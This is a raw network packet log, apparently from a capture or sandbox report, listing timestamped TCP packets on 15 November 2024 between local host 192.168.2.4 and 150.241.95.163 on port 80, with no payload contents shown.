                                                                                                                                                                Nov 15, 2024 10:28:30.364105940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364144087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364161015 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364171028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364182949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364204884 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364289045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364299059 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364310026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364320040 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364330053 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364355087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364451885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364464045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364474058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364492893 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364506960 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364573956 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364586115 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364598036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364620924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364864111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364875078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364885092 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364905119 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364933968 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.364985943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.364996910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365008116 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365020037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365026951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365031004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365072966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365396023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365407944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365417957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365434885 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365459919 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365674973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365777969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365788937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365811110 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365902901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365912914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365940094 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.365946054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.365981102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.405859947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.405917883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.405973911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.406234980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.406249046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.406302929 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.462578058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.462601900 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.462611914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.462769985 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.463329077 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.463375092 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486299992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486326933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486336946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486356020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486366034 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486377954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486398935 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486418009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486429930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486438990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486442089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486465931 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486496925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486507893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486519098 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486535072 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486555099 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486573935 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486584902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486596107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486613035 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486624002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486635923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486645937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486661911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486686945 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486814976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486824989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486830950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486850023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486860037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.486884117 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.486917973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487030983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487040043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487072945 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487411022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487449884 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487670898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487680912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487696886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487711906 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487711906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487723112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487734079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487751007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487761974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487772942 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487781048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487786055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487792015 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487799883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487802982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487813950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487826109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487826109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487852097 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487914085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487924099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487936020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.487948895 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.487967968 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.488085032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488095045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488123894 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.488300085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488310099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488322020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488332987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488358021 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.488384962 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.488957882 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488970995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488981962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.488998890 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.489006042 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.489012003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.489036083 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.489054918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.489065886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.489072084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.489198923 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.531296968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.531333923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.531344891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.531498909 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.585736990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.585753918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.585767031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.585798979 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610136032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610158920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610172987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610187054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610198975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610204935 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610209942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610225916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610236883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610244036 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610265970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610301971 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610335112 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610414028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610425949 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610457897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610469103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610482931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610512972 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610644102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610655069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610665083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610673904 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610685110 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610702991 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610795021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610805035 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610816002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610827923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610840082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610850096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610852003 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.610862017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.610884905 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611000061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611037016 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611099958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611171007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611181974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611243963 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611254930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611264944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611293077 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611304045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611310005 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611323118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611327887 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611366034 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611445904 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611500025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611536026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611717939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611768961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611780882 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611803055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611876965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611887932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611897945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611908913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611922979 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611938953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611948967 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.611948967 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.611974955 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.612178087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612189054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612205029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612212896 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.612242937 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.612310886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612322092 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612333059 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612339020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612369061 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.612643957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612833023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.612874031 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.613023043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613034010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613044024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613054991 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613060951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.613085985 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.613116980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613127947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613137960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613148928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.613173008 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.613197088 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.613751888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.654400110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.654422998 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.654436111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.654479980 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.654511929 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.709057093 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.709073067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.709085941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.709117889 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733355999 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733376026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733387947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733402014 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733402014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733427048 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733474016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733491898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733503103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733514071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733519077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733534098 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733725071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733761072 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733820915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733833075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733843088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733855963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733865023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733869076 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733875990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733886003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733886957 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733903885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733916044 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733918905 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733927011 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.733939886 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.733963966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.734065056 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734076023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734086990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734224081 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.734316111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734327078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734338045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734352112 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.734379053 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.734796047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734811068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734858990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.734985113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.734997988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735009909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735019922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735030890 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735030890 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735042095 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735047102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735054016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735076904 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735089064 CET8049736150.241.95.163192.168.2.4
